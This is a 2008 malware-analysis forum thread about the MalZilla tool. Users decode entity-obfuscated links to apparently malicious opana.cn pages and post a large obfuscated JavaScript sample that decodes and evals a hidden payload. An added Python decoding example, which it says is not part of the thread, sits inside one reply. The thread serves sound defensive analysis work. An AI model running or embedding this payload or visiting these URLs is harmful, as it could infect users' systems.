Author Topic: MalZilla  (Read 257387 times)


August 17, 2008, 09:12:59 am
Reply #180

brewt

  • Special Access
  • Newbie

  • Offline
  • *

  • 8
hmm, is there an easy way to decode these unicode html entities?
Code:
&#104&#116&#116&#112&#58&#47&#47&#111&#112&#97&#110&#97&#46&#99&#110&#47&#121&#97&#46&#104&#116&#109&#108

&#104&#116&#116&#112&#58&#47&#47&#111&#112&#97&#110&#97&#46&#99&#110&#47&#97&#108&#108&#46&#104&#116&#109&#108

August 17, 2008, 09:33:48 am
Reply #181

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
hmm, is there an easy way to decode these unicode html entities?
Code:
&#104&#116&#116&#112&#58&#47&#47&#111&#112&#97&#110&#97&#46&#99&#110&#47&#121&#97&#46&#104&#116&#109&#108

&#104&#116&#116&#112&#58&#47&#47&#111&#112&#97&#110&#97&#46&#99&#110&#47&#97&#108&#108&#46&#104&#116&#109&#108

Decoded
Code:
http://opana.cn/ya.html
http://opana.cn/all.html
This was decoded, using the "Enter decimal ASCII here." box available here
Malware analysed using clarified analyzer to record and document how malware behaves in a networking environment
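Decoding these semicolon-less numeric entities is easy to script. The Python below is an added example, not part of this thread or of Malzilla; it embeds the two strings brewt posted as its sample input and re-derives Orac's result, handling both decimal and hex references with or without the trailing semicolon.

```python
import html
import re

# Sample input: the two entity strings quoted in the thread, one per line.
# Note the decimal references carry no trailing ';'.
SAMPLE = (
    "&#104&#116&#116&#112&#58&#47&#47&#111&#112&#97&#110&#97&#46&#99&#110&#47&#121&#97&#46&#104&#116&#109&#108\n"
    "&#104&#116&#116&#112&#58&#47&#47&#111&#112&#97&#110&#97&#46&#99&#110&#47&#97&#108&#108&#46&#104&#116&#109&#108"
)

# Decimal (&#NNN) or hexadecimal (&#xHH) numeric character references.
# The semicolon is optional: browsers accept the sloppy form, so obfuscated
# pages routinely omit it.
_NUMERIC_REF = re.compile(r"&#(?:[xX]([0-9A-Fa-f]+)|([0-9]+));?")


def decode_numeric_entities(text):
    """Replace every numeric character reference with the character it names."""
    def _replace(match):
        hex_digits, dec_digits = match.groups()
        code = int(hex_digits, 16) if hex_digits else int(dec_digits)
        if code > 0x10FFFF:
            # Not a valid code point: keep the raw text so nothing gets hidden
            return match.group(0)
        return chr(code)
    return _NUMERIC_REF.sub(_replace, text)


def decode_lines(blob):
    """Decode each non-empty line on its own so adjacent URLs stay separate."""
    return [decode_numeric_entities(line) for line in blob.splitlines() if line.strip()]


if __name__ == "__main__":
    for line, decoded in zip(SAMPLE.splitlines(), decode_lines(SAMPLE)):
        # The standard library accepts the same semicolon-less form, so it
        # serves as a cross-check on the hand-written decoder.
        assert decoded == html.unescape(line)
        print(decoded)
```

The hand-written decoder leaves out-of-range code points untouched rather than substituting U+FFFD as `html.unescape` does, so an analyst can see exactly what the page tried to smuggle past the parser.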

August 17, 2008, 02:06:21 pm
Reply #182

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
In Malzilla, you can do that on Misc Decoders tab.

btw. hopefully, I will release Malzilla 1.0 today - it will have the most robust decoders ever (for unicode, hex, dec...)

August 17, 2008, 05:52:18 pm
Reply #183

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla

August 17, 2008, 08:50:29 pm
Reply #184

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Nice one dude :)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

August 18, 2008, 08:33:42 am
Reply #185

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
Thanks Bobby :)
Malware analysed using clarified analyzer to record and document how malware behaves in a networking environment

August 19, 2008, 12:27:53 am
Reply #186

tjs

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 248
Congratulations!! This is great news!
Getting to v1.0 is a huge milestone! It's incredible how widely adopted this tool has become.

Keep up the fantastic work, Bobby!
TJS

September 01, 2008, 10:51:55 pm
Reply #187

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
The following code gives Access Violations in Malzilla.

Code:
var uaigei=Array(63,0,0,0,0,0,0,0,0,0,0,0,0,0,0,46,44,21,55,40,22,1,53,39,38,0,0,0,0,0,0,20,42,0,37,3,54,15,4,36,11,12,59,10,32,58,9,19,16,25,26,28,51,48,24,7,49,56,0,0,0,0,0,0,5,8,52,14,17,2,27,18,43,47,13,41,45,30,31,29,50,57,33,35,6,23,62,61,60,34);var lszxla="osc5OV75aesD672vRks6uZHeur@eJeBhXs@eQkaPX4ceuZGPpY@@JpBPeYHaueYuFcaaW1YuR4euQM6GRyBQ@MsuoV6GSceGeHYDJesDhJqvbm2fSYChLYH5SeeuhJqvbm2fJaaPTm2e@V75aOMDWZMGtyGvXl@vBRceO4E5Js@vJR5Bu2VeBb7bosc5O1aaXY2eaOYbpma@hmaaupMSgYGhpYHRIkGPL72BX6B2Ls@vLa@BJ6M@@kfQFaBfg6M@pma@hmaaupMSgYGhpYHRIkGPL72BX2VfIBB2Ls@vLa@BJ6M@@e7bBx@Bb1aBh775QO75@Wc6AmaPb7aP9mcQJl@v6T@6I1Q6I1BB@lGhpl@Q6VGBhea2tBcP6MV5Bb2vg6C@geseXZuPpREhDYHhpaVfI@VeBQChb7Ch6aBPBba2@kfQFaBfg6M@pma@hmaaupMgJ7CRIkGPL72BX2VfIBB2Ls@vLa@BJ6M@@e7bBx@Bb1aBh775QO75@Wc60Y@v9mcQJl@v6TGB@lGhpl@Q6VGBhea2t1aPpY75XaV5BbYb@kqvbm2fgY@5aeYeJr2f4m75b62BIQVfa1BQRmQ6IB@eI@VfpYcfa1VQJmQ6IV@eI@VfLscfa1BPLmQ6IW@eI@Vful7fa1QRsmQ6I4vTI@VfoYcfa1Qg9mQ6I1aPI@Vfu7cfa1Q5JmQ6IB@vI@VfL2cfBbYbFY7eL7aQup@f0R@Bb6M@tyahgCVPSRGabpMSgYGhpYHRIkGPL72BI48hgmMBgY@5aOXucOVfp6cedpVgIbV5JC2eqm6pf1BPN6C5IbV5JC2eql6pf1Be9mcff1aPR2HTpQ8BI4@vI@VfIBVbosc5O4ahResSgYGhpYHR6M@6I4vQIbV5JC2eqY6pf1QeXM55R2GQIbV5JC2eqx6pf1QvBRceIBMGtyahgCVeaeYeT2@ehJqPXsGeJeYfzmuGRGeGpVY6JaaPIbYbFpGhGYGaJxahaaVfFlCeX1uvIbV5JC2eqm6pf1QPrs@v6aVPSRc60Y@vNC7ff1aPR2HTnQ8BIBGhaxEff1aPR2HTeQ8BIcGPgaVuB@VPXsGeJ6VfBbYbpma@hp@e@4E5Js@vJR5Bb2VfH6HhgmMBgY@5aOXGcOVfux@vXGXRIbV5JC2eqseucOVfx7vnIBMGX2c6uCaPXaVf0Y5oI@BPeYGvg2@6Fs@eSYGBhQ7bLs@vLa@BJ6M@pma@hp@e@4E5Js@vJR5Bb2VfHmMBgY@5aOXuWQ8BIQ5RgTQTHmMBgY@5aOXuRQ8BIcvormBBhT@eXW@5Jp@BIZugxmQ6JaaPTm2eayGhalaPBb62t4Ghpl@Q6VGBh775QO7eaesSgYGhpYHR6M@6IQEff1aPR2HTWM6pf1BRCmY6NYc5IbV5JC2eqsYucOVfgaXRIbV5JC2eqseucOVfx7vnIBMGX2c6uCaPXaVf0Y5oI@BPeYGvg2@6Fs@eSYGBhQ7bLs@vLa@BJ6M@pma@hp@e@TGPnCQTH25Wp725KYG5TYH5paBBhT@eXW@5Jp@BIZugxmQ6JaaPTm2eayGhalaPBb62t4Ghpl@Q6VGBhmaPpY75XCQuhQa2@e7bX2c6SYcekaVeT2@eBbYbgmGaX2c6gYH5RRceSYcSu7G@hJqvbm2feesSgYGhpYHR6M@6IMEff1aPR2HTW46pf1QgipMnpmMBgY@5aOXupQ8BIMGeIBMGtG76x625Je6uhJfP
os@e61Q@XQEff1aPR2HTWV6pf1BP@4sGepMRIbV5JC2eqsYXcOVfXaBBhG76wm7ff1aPR2HTWZ6pf1BP617hBbe@X4XhIbV5JC2eqsYucOVfxRcPIbV5JC2eqm6pf1BP6ycebeGPa16Bh4ahRpMn6mMBgY@5aOXXcOVfaY5@IbV5JC2eqr6pf1BvpY@BFpGhGYGBh1BBhJq5J7avgp@fWbYb@kqPTpHhp6HeXCBeksHh6BM@tyahgCBQ@HsGtyahgCQvbmCPJ7aaXYHvOME5gsG@61VSm6YXAY6Xo1MBgY@5aOvucOVfoV6SSQBuWc5uGBeGSMu6RHsSRcYgAm6G1lYXI@Vf4muGilugm7Eff1aPR2HTRQ8BIV9SnVu6pZ6gWQBGS1YuGc5X4m6uRy6unM6uo1Q6IHeuRyYgR4suIbV5JC2eqC6pf1QuRHeuGHeuRH66ACeuRQQuRHeuRHeuRHeupyYfa1QuRHYXjCsu4mMBgY@5aOvucOVfRHeuRQQuRHeuG45uRH66RHeuRHeuRHeuRcYXI@VfoVHugHsXRMcff1aPR2HTRQ8BIZYXocG6pVGPoQQGnBshGcHhWyGhQMePgyHhS1Q6IyeXWc6XW1YSIbV5JC2eqC6pf1VSQZeGGc6XWcu64CegeQVgAx5gjlsu1asuS4Efa1MXjYYSnyEXS1MBgY@5aOvucOVfjCYXjeQXS46uGG6Sgy66S46G1CsuAC6S1legI@VfRysXg46gRBYff1aPR2HTRQ8BIy5XAm66p4sheQQGSVeGGH6Gjl5gWcESRZYXo1Q6IysuQy9XgVYgIbV5JC2eqC6pf1BuimegGceGSM6646YgmeQGnceGpZYXe1euWHYfa1VS4C6ueV6GQ1MBgY@5aOvucOVfWcESSQQXpyGGGGsui766py6upVeXAaeXix5GI@VfmCsSRZegTyYff1aPR2HTRQ8BIZsSoB66p4YgWQVSpM5uG16XjY6SWMYg4muuQ1Q6IV5GAl9Sm7EgIbV5JC2eqC6pf1MS4meGGc6Go1G6iC6XRQVXACsXA6YXgcsXo1EfaTGva2GBhJzv66@eJaQvbmCPJ7CTBeXBhkqvbm2fbeYeT2@ehJfh@cHeLYaeJp@vX4c5Js@vJY5eJeGPX72BIWchDYHhpmBBhJfhX4aPps5vpmaQIY2vJaV5JC2eqseGcOVfblC5B7cfa1aPR2HTWG6pf1M5B7cGIbQvbmCPJ7CTBeXBhJfQFaBhBb2vg6C@osc5O1GaAmaPb7aP9aBha1Mn6mMBgY@5aOXXcOVfapBSRC2eBmMBgY@5aO3XcOVfp6HeXmBBhBcP61GBh6cP6Z9e6MGBB1aPpY75XCBuhQa2Ls@vLa@BJ6M@@e7bBOMBhJf2tQ7bBx@BG7GhLaBBBHM5TlHhJlC5@MsGtBcP6MM5TlHhJlC5Bb7bkRHhTeGPX776nmaQpY@BI@s5LmaQR72fascedYahdYGa!m9nLmaQR77a7m2pXmMBtZMnJ72fJ2GPGeePulGvGYceppMhgYGhpYGgaYGeJp@v61MeIrMBgY@5aOvXcOMDL77fBZMBI@357pcffJzDFpGhGYGaIbESQHeGTMeGXV@@JmMDf1Qpg23eIbVbdV@eJec6SY@v472vg6chT7aPO1BQkmQ6IV@eJecfdbVf7m2pXmMBtZBPaYGeX4aPps5vpmaQIY2vJCVfdbV5JC2eqseGcOMDblC5B7cfa1MDf1aPR2HTWG6pfZM5B7cGi7uGo4uXTysDf1aPR2HTRQ8Bdy6X4l66WMegRQBGe46SGHeuACeXjlEuQV9uo1MDf1Qpg23eIbVbd4XPpCMeIkGaJ2GPGpMSgYGhpYHRIkGPL72BI4vQdbV5JC2eqY6pfZQeXM55R2GQdbV5JC2eqx6pfZQvBRceI@VfIBMDf1Qpg23eIbVbI4XPpCVeSCaaumcQXTuhGYHnRsHhJaVuRBQpg23eIbVbd4XPpCQ5XeGaXl25XHXh
glaP8sGeJaVfN6aeIR@eXc2vFmBBdbVf7m2pXmMBtZQvGCaaNC2eB72BRpGeXHXhpa@6I@vpI@B6W@BuBZMBI@357pcffJzDRs@v6eevGC2BRBQfFHVf723fOyQfOcaeRaBuBHVDO1Qp7mMDf1Qpg23eIbVbIycebeGP@Hahpa@fFHVPXsGeJ2357pcffJzDSY@vOc25WC2P@4E5Js@vJREhDYHhpaVfH6HhgrMBgY@5aOXGcOMDux@vXGXRdbV5JC2eqseucOMDx7vnIBMDf1Qpg23eIbVbdBGQWYaapCa5R7c69CaPXaVf0Y5oI@BPeYGvg2@6RBMDf1Qpg23eIbVbIc25WC2PX4XPX7@BB@357pcffJqf9p@f1m75um2fKYH5TeGPOTuPe72pg23eIbVbIVHPS62QueevRs25kpV5Jl25upH5Jm9ek62pg23eIbVbd4XPpCBhLxa5Wm25@V@eJec6AmaPb7aP9mcQJl@v61MnLmCDf1aPR2HTWQ8BdcaQXrc6jrMBgY@5aO3ucOMDJlX@SrMBgY@5aO8ucOMDGREhdbV5JC2eq76pfZMhpmQ6I1BBdbVf7m2pXmMBt1MnJ72ff2@P@MHhosa5gC76AmaPb7aPxY@@pxuQaY@BFpGhGY@6Oc3nyYuB7m2pXmMBt1Qeu77@ueGaCYceiaBPdla@6RGB7m2pXmMBt1Vgum2fDe6uOc8eO@HepkCeG2357pcffJqfR2HQul2e@QuQkm5BJrH5QaHeaJ@6WBQpg23eIbVbIMahGC2ee7Ga4lChiaQ5aOHeS2GB7m2pXmMBt1MQa7c6wmaQpY@BAac56MahGC2ee7GBB@357pcffJqf8Y@@p2357pcffJqff2@PX45eulaP7m2pXmMBtZMnJ72fQ6@5pe6PaYGeX4E5Js@vJREhDYHhpaVfwl8hgrMBgY@5aOXucOMDppMn6rMBgY@5aOXXcOMDamQ6I1BBdbVf7m2pXmMBt1MRXCBggmCegCVnJlavGY@f8Y@@p2357pcffJqfQ6@5ppVnIbV5JC2eqs6GcOVfOycebeGPaMe6js5RNY5pg23eIbVbd@epu4Chg6@5ppsDBbYb@kqbBx@Bb4avLlGPSlaBhkfPeYGvg2GaTm2efZBGdbYbkRHhTeGPX776nmaQpY@Bd@seIkGPL72fL2GhSlaQkeYfL2H5B7cGTBegi75g4x66QM5GRQQXgM5XG15Ggc66Q19STHsSAssXgyuXIHBQkeYfpYH5pmVa2WMeIkGPL77adBMGtc75QO2vJl2vXc9enp@eus@Pj6@eJaBPeYGvg2@6ITV67232pe@5RHeuWTBPeYcfa1QuI@VfR1BBhcHeLYaeJp@vX@HeLs@vBRce@1BPeC2eu6@vSRQ@QTQ56CCaPYcepY75Be6uIb62Ls@vLa@BJ6M@@kf2tJqvbm2fXR@5@ZBGRZQ6XRHh@ZQuArQ6SlcP@ZVgdbYvbm2fSaGPa2HhuesDJVaXpVESJVCXTGYSJV2GilsSJVCuTZeXJV2uSZeGJVaXoyuXJVCXoGYSJV2uS1eudbVbdVBvS4YgTVBvpBsSQVBv475XWVBvmm9uSVBvRy9uoVBvWcYS1rMBdVBvSGYueVBvncYggZMBtZBDTluuRG6DTCegAmuDT7uSR46DTYESpH6DTlYS1xuDTr6Xmx9DfZBDTY6g1r6DTY6ge19DfJzDJV2uS1eXJV7Xoc5gJV2uAaYSJV2Gi7YSdbMDJVauAY6gJV2gmCsuJV2upGYSJV2uSGYSdbVbdVBvAlsSTVBvn1sXTVBvocEXAYBvoVEXjYBvocYu1YBvo4EXAYBvgV@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@HJqvbm2fumcQ@TGva2HGHJhvg6C@HJzeIkGakRHhTeGPX776LmaPb7aP12GPGYcepaVfumcQJl@vIBMGHJzeIkc6SY@v472vg6chT7aP61M
hasH5S6@PI@VfL2H5B7cG1l5XpcsSix66SV9X1eQXey6XG1uuAl66Rcugn16gjl6GilYgIBMGHJfQFaMeIkGBheqbosc5OQG@S775BpHP@V7eJlChbCaP642QJ2@eLRHBIVBvSZsuW1BBhQqbosc5OGchSeeueseuRHeuR@M5Slaa6mH5GGBeQl2vg6cedpQeJpHPpacBgbQueleGBb6OtyahgCQQIeeBRG2uLCshR4@uLeQQIlaBuGchSO6OtyahgCBeQxahge6vXYH5Ls@5JaVfJV7ffTHeLOVeulHBIVBvIbVeulHBXRHhBb6OtyahgCM5Se6eQxahgO6OtZ2QB2GP64C5X@GPXr@v6kVu24C5S6M5SOBaSlCGHJz5Ses5SpM5TmH5pmaQXr@BR@M5SlC6gBMGHJqvbm2fGeYeJr2f4m75b62BBb6OtyHegaBQ@HsGB2eQIO6QfbBBGOXQces5SOBeQl2vg6cedO6OtJaaHs@v6pMhJ6@e6He@R4@uLCshR4GBhQqbPeePulGvGYceppM5LmaQR7C5qC6pX4c5Js@vJl9eX775u2cnbpHPJaBBX@GPXr@v6O6OtQaOtQChb7Ch6aBPBba2HJf2HJfOtBcP6MM5TlHhJlC5Bb7bumcQ@cHeLYaeJp@vXZ75B7aP6ZQaBxc5beGPO475LeYfJa25aRGQplC6esYuIpQ56CCaueYuFcaaW1YuR4euQM6GRyBQ@MsuoV6GSceGeHYfOZaQk72Q@Hef6YGQda@v@HYa2WBQFmahGYcadBMGtQ7btQqbBx@Bb4avLlGPSlaBheqbosc5O1aPR2GaXYHvOME5gsG@61MhamQ6IQVfBb6Otc75QOaOtWchDeePulGvGYceppMhgYGhpYGgaYGeJp@v61MeIkGPL77fBb6OtWchDpM5J7aSp775BmGvpY@BgY@5aOvucOVfblC5B7cfa1aPR2HTRQ8BI4aQkkYujYeXgMEu1mMBgY@5aOXucOVf179SQQQXix9XGGsSis66eZsSQB6uQy9Xj6suIBMGHJqvbm2fG6C5pmaQXrGaTpGPSlGhRY@BSaGPa2HhuOMDJVCuS46udBMGHJqvbm2fG67vbm2f@HBvXYH5Ls@5JaVfJV7ffTHeLOVeulHBIVBvIbVeulHBXRHhBb6OtyahgCVhI2HeLO@f@HBeQxahgO6OtyahgCM5SCahLY@f@HVuRHMBOQG@S775BpHPX@GPXr@v6O6OtZ2QB2GPOGVhI2HeLOc6aYced72QO@efSl25blGPBHVhI2HeLO@ffQefIm@eulHQhQqbosc5OychaRHhfCBaO1chaRHhfpM5TmH5pmaQXr@BR@M5SCahLYGBhQqbosc5O1@eulHQOQefIm@eulHQX4avIl2vg6cedaQua1chaRHhfpQeJpHPpa@fGHM5SCahLYGBhQqbnaGQaY@f61@eulHQX@GPXr@v6CMBO4C5RsHhJCQaOHe@pHeuRH6BO1@eulHQOQefI2HeLO@ffHVhaRHhfCMBOychaRHhfO6OtyahgCBeJe@f@HVeJr2f4m75b62BBb6OtyHegCQBBeeuhHBQ2ceuRbefBOMBBHBeJeHTBeXaI2HeLOHBG6C5pmaQXrHGHJqvbm2fIY7POQefdZMGHJzv66@eJCQBIY7PX@GPXr@v6CQaO4YuBHVhTx@f@HVhTx@ffHBvXYH5Ls@5JaVfJ1MBXRHhBb6OtyahgCBeOQefdZMGHJfeOQefumcQX49eXlCeaYHGHJzeIkc6ARceSR@eJCBaO1GvFO6OtWchDpMSupH5u2GPOQefGO6OtQ@f@HMeIkc6ARceSR@eJO6OtWchDpMSupH5u2GPOQefIY7PhQqbumcQX49eXlCeaY@f@HBehQqb@lGhpl@Q6VGBheaOtQaOtQqbBx@Bb4avLlGPSlaBhkqvbm2fpsc5dY@vWQePulGvGYceppMhgYGhpYGgaYGeJp@v61MeIkGPL77fBbY
bpsc5dY@vWTM5J7aSp775BmGvpY@BI4@eblC5B7cfa1MhalaQkkegAYEujaYSWQBST1euGM6um766ey5gRQQuRc5uirsXSHYunZYfBbYbosc5OcahgrGPpm6akRHhTeGPX776LmaPb7aP12GPGYcepaVfumcQJl@vIBMGtcahgrGPpmY6SY@v472vg6chT7aP61MhasH5S6@PI@VfL2H5B7cGQc9uQ1YuSVu64Y5G1eBuWc5XGGYgml66RHegR19Xn4eugZsXIBMGtyahgCBeQl2vg6cede6vXYH5Ls@5JaM56Y@ealHefZBDTleuSMsDBbYbosc5OQG@osc5@V7eJlChbCaP61BDTmMBXR@5fTHeROVfJV7ffTHeROVeuCaBhJqvbm2fI6HPI2HeLOGaG67vbmCGtyahgCM5al25blGP@1eufQG@S775BpHPX@GPXr@v6OYbnaGQaY@BI6HPI2HeLOc6aYced72Q242eSCahLYGBI6HPI2HeLOHB@1GQdm@eulHQhJqvbm2fF6@eam@eulHQ@1GQdm@eulHQX4avIl2vg6cedaQua42eSCahLYGBhJqvbm2fI2HeLOGaI6HPI2HeLOc6SY7hS775BpHP6He6I6HPI2HeLOc6aYced72QG42eSCahLYGBhJzv66@eJaVhaRHhfpQeJpHPpaHBS2H5RsHhJ2eue7euRHeuB1@eulHQ@1@eulHQf1@eulHQfyGQa2chaRHhfOYbosc5OQGPGRc5QeYeJr2f4m75b62BBbYbFRc56GaaRbe@2GeuRbe@fbBBGYGeuma@qaap@1@eulHQfQG@S775BpHPhJqhTxcPJmaaI@v@RMcfhJfhk7@f@HVhTxcPJmCBIY7PFYc5f1GvFxGPgOVhTxcPJmCGtZ2QB2GP61GvFxGPgpQeJpHPpa@aTHeuRBVhTxcPJmCB@M@PkOYbpma@h7ahgrGPpsY6SYc5oYc5@1GvFxGPgOevbmCPJ7auXBceB7aQb2GQPY@BBbevbmCPJ7auX4aPX7@BBQChb7Ch6aBPBba2tc75QO2vbmCPJ77uX4aPgxaPgeYhTxcPJmCGpsc5dY@vgTV5JlGPBxaP6BMG@lGhpl@Q6VGBhe7b@kqbBx@Bb4avLlGPSlaBheqbosc5O1aPR2GaXYHvOME5gsG@61MhamQ6IQVfBb6Otc75QOaOtZaQXkaQReePulGvGYceppMhgYGhpYGgaYGeJp@v61MeIkGPL77fBb6OtZaQXkaQRpM5J7aSp775BmGvpY@BgY@5aOvucOVfblC5B7cfa1aPR2HTRQ8BI4aQkk6SRB6S1xeGjmMBgY@5aOXucOVfiseXmeQXSV5gG19XW466is5XW4YgR4eXQHeXIBMGHJqvbm2fG6C5pmaQXrGaTpGPSlGhRY@BSaGPa2HhuOMDJV7uR4eGdBMGHJqvbm2f6l2vus@PkmaaRG2uLCshR4@uLO6OtyahgCQQIlaQPYGaRG2XRHeuRHsGHJqvbm2fSCC5alaQPYGa6mH5BkaPGGBeQl2vg6cedpQeJpHPpacBgbQueleGBb6OtyahgCBeQxahge6vXYH5Ls@5JaVfJV7ffTHeROVeuCCBIVBvIbVeuCCBXR@5Bb6OtyahgCVhBrch@QG@osc5hQqbnaGQaY@BI6HPIpQeJpHPpacBg@s5Rl2eS6c@J6VhBrchfQYhBrchhQqbI6HPIeYhBrchX4avIl2vg6cedaQua425S2H5BkaPu16BhQqb6m@eulHQSeeB6l2vus@Pkma6RG2XRHeuRH6BuGchS6c@JO6OtyahgCBeJeHeg6aaXYHvOME5gsG@6BMGHJqPum2Bosc5OBGaRb6Q2GchaRHhflCGBOMBBQGPGRc5QOXQceYhBrchfQG@S775BpHPhQqbosc5OcaPS7aadZMGHJqPum2BBe6uhB@ag46uhBHBfBQvJl2vfQsD4rMGHJhvJl2vfQYf7a2uL2v@R4@peCsh7a2
uL2v@R4@peCsh7a2uLmMGHJhvg6C@n6ceP6@5X4E5Js@vJpuPnx9ea7GPgxE5uecRbeGP6caPS7aB@lGhpl@Q6VGBheaOtQChb7Ch6aBPBba2HJf2HJfOtBcP6MM5TlHhJlC5Bb7bosc5O1aPR2GaXYHvOME5gsG@61QvBmQ6I1cQIBMGtc75QO7bosc5OcaPS7aaJxahaaVfXYHvOM9hIbV5JC2eqC6pf1VvJa8RIbV5JC2eqs6pf1BPL72BdMXvBlHQx6GeJpBnT6Hhf7XQGYHDB1BBhJqvbm2fG6C5pmaQXrGaTpGPSlGhRY@BSaGPa2HhuOMDJV7uR4sXdBMGtyahgCQQS7Ceb7@PgeeueCshR4@uLCshhJqvbm2f6mH5BkaP@He@pHeuRHeuhJqvbm2fSCC5alaQPYGa6mH5BkaPGGBeQl2vg6cedpQeJpHPpacBgbQueleGBbYbosc5OQG@osc5@V7eJlChbCaP61BDTmMBXR@5fTHeROVfJV7ffTHeROVeuCaBhJqvbm2fI6HPIe6eQxahgOYbnaGQaY@BI6HPIpQeJpHPpacBg@s5Rl2eS6c@J6VhBrchfQYhBrchhJhQI2HeLOH5@GQQS7Ceb7@PgeQue7euRHeuRBM66mH5BkaPhJqhBrch@1GQdmc6SY7hS775BpHP6He6SCC5alaQPYH6gBMGtyahgCBeJeHeg6aaXYHvOME5gsG@6BMGtyHegaVvbm2fBeeuhB@a6m@eulHQSO6QfbBBGYGeuma@q6Gp@1GQdmHBG6C5pmaQXrHGtcHeLYaeJp@vXZ75B7aP6ZQaumcQJl@vO45R4l8nM7uaI4@eS6@PPHYuixEuTcuXGGsSWZ66p1EuSQVSAaeuGc9upGeG4m5gmlEXimVa2HahgsGeOTGhGYGaI475LmQfos@eTYGaIV@@R2HeB7C5uGCXIpQ56C7fv@e5bmahGCVebeGP@1BhT7CeR2GhQmQfos@eTYGaIc75TYcfv@e5bmahGCVebeGP@1QeuR@5IHVvb2GvJeYfFs@eSYcfv@e5bmahGCVebeGP@1Mhup@vgR@eaYc5IHVvb2GvJeYfpmavJmVa2WMeIkGPL77adBMG@kzhb7Ch6aBPBba2tQ7btBcP6MM5TlHhJlC5Bb7bpma@hkqvbm2fumcQ@cHeLYaeJp@vX4c5Js@vJY5eJeGPX72BIWchDYHhpmBBhJzeIkc6SY@v472vg6chT7aP61MhasH5S6@PI@VfL2H5B7cGWHeun1sS1lu6e49SWQBuWcuuGBeGoVu6RH6SR4uGTVYSp16gIBMGtyahgCQQS7Ceb7@PgeeueC6XRVeuTH6XhJqvbm2fG6C5pmaQXrGaTpGPSlGhRY@BSaGPa2HhuOMDJV7uR4sudBMGtyahgCQQIlaQPYGaRG2XRHeuRHsGtyahgCQ5alaQPYGaG6C5pmaQXrc6aYced72QD1sGtyahgCM5Rl2eS6c@JeeQIlaQPYG66H2eS6c@JOQueleGBbYbosc5OQG@osc5@V7eJlChbCaP61BDTmMBXR@5fTHeROVfJV7ffTHeROVeuCaBhJqvbm2fSCC5ae6eQxahgOYbnaGQaY@BSCC5apQeJpHPpacBg@s5Rl2eS6c@J6M5Rl2efQs5Rl2ehJqvbm2fSCC5aes5Rl2eX4avIl2vg6cedaQua425S2H5BkaPu16BhJhQI2HeLOH5@GQQS7Ceb7@PgeQue7euRHeuRBM66mH5BkaPhJqvbm2fGYGeuma@@TGPnCBSgmahQaBBhJqPum2BBeeuhB@a6m@eulHQSO6QfbBBGYGeuma@q6Gp@425S2HBG6C5pmaQXrHGtyahgCM5Sm2v@ZQfGY@v6R@P@1MDhJqPum2BBeeuhB@aWHeXSZsGBOMBB4C5g7CB@ZVDLG2uTH6XhZMGtcHeLYaeJp@vXZ75B7aP6ZQa67aeaCQ@G2ceSkYv@1BvgpcGSl@QJeGhSeBeBlc5ulC
eF7a6LRGePyaeamVa2WchDYHhpCBQkeYf!e5RKYcekYc5IHMhasH5S6@P@1MSClXWmk6uRHsXg4ugAeQGAluuGM6ums66QGYX1eQuRM5uA66XT15XgVEfv@s6umcQJl@vv@s5p62eJpYv723GDb7hJaGho6Hegk6vg2@BLyXRCmXPX7GPg6MG@2s6S7a@aYca2y7GgYHhpCM5p62eJeYfn6@PpacGW1euR7CG6YGQda@vPGeuR77fOyGQa2Hhu2HegeYfgY@PITeaokYPB2@edbM5Sm2vfZVfv@s6okY5Jl@vv@s6okYPB2@evZBBhJf2Ls@vLa@BJ6M@@kf2tJfQFaBfSYChLYH5S6M@tyahgCV5JC2e@TGPnCBSgmahQaVfJmcfa1BQJmQ6IW@eI@VfLRcfa1BPpmQ6I@GQIBMGtc75QO7bosc5OZ7vF6GaIZ3ff1aPR2HTRQ8BIy3ff1aPR2HTWQ8BIZ7gIbV5JC2eqm6pf1QPJmaWIbV5JC2eql6pf1VeXZ3ff1aPR2HTRQ8BIy3ff1aPR2HTWQ8BIZ7gIbV5JC2eqm6pf1QPJmaWIbV5JC2eql6pf1VeXMYfhJqvbm2fnx7PBRGaXYHvOM9hp6cvJa8RIkGPL72Bnx7PB6MGtyahgCBeQl2vg6cedesDJVCDfTHeROVeuCCBSaGPa2HhuOMDJV7uR4YudbYbnaGQaY@BG6C5pmaQXrc6aYced72Q24eun16BG6C5pmaQXrHB@1BDTmMBXRHhfTHeLOYbG6C5pmaQXrGaTpGPSlGhRY@BG6C5pmaQXrGBhJqvbm2fG67vbmaaTpGPSlGhRY@BIVBvIbVeulHBXRHhBbYbosc5O1GQdmGaG67vbmCGtZ2QB2GP61GQdmc6aYced72Q2QeueseuRHeuRBVhBrchfQYhBrchhJqvbm2fGYGeuma@@TGPnCBSgmahQaBBhJqPum2Bosc5OBGaRb6Q2MYuRb6QfbBBGYGeuma@q6Gp@1GQdmc6SY7hS775BpHP6He6RGauRHeuRH66G6C5pmaQXrc6aYced72QBbBeQl2vg6cedOYbFRc56yahgCBQ@HsGB26uR1eXhBHBfBM@tyahgCMvoxGQueYeJr2f4l@vBxaPYREhDYHhpaMvoxGQBbYbJxahaaVfpma@hr7vF6HeX47ff1aPR2HTpQ8BI43ff1aPR2HTTQ8BI4GP6He@nycPFxcPFY@6R@Qua1eugM6uoMeueBMG@lGhpl@Q6VGBhe7fBbYbosc5OZ7vF6He@TGPnCBSL7aQoY@T9mcQJl@v6Z7vF6GBhJf2tQChb7Ch6aBPBba2tQ7btB";var vibqt=13886,uwchr,pxhy,gyyqwo='',hgkmmtap=xlkxqsz=ruleddw=0;for(pxhy=14;pxhy>0;pxhy--){for(uwchr=Math.min(vibqt,1024);uwchr>0;uwchr--,vibqt--){eval('ruleddw|=(uaigei[lszxla.charC'+'odeAt(hgkmmtap++)-33])<<xlkxqsz;');if(xlkxqsz){gyyqwo+=eval('String.fromCha'+'rCode(41^ruleddw&255)');ruleddw>>=8;xlkxqsz-=2}else xlkxqsz=6;}}eval(gyyqwo);
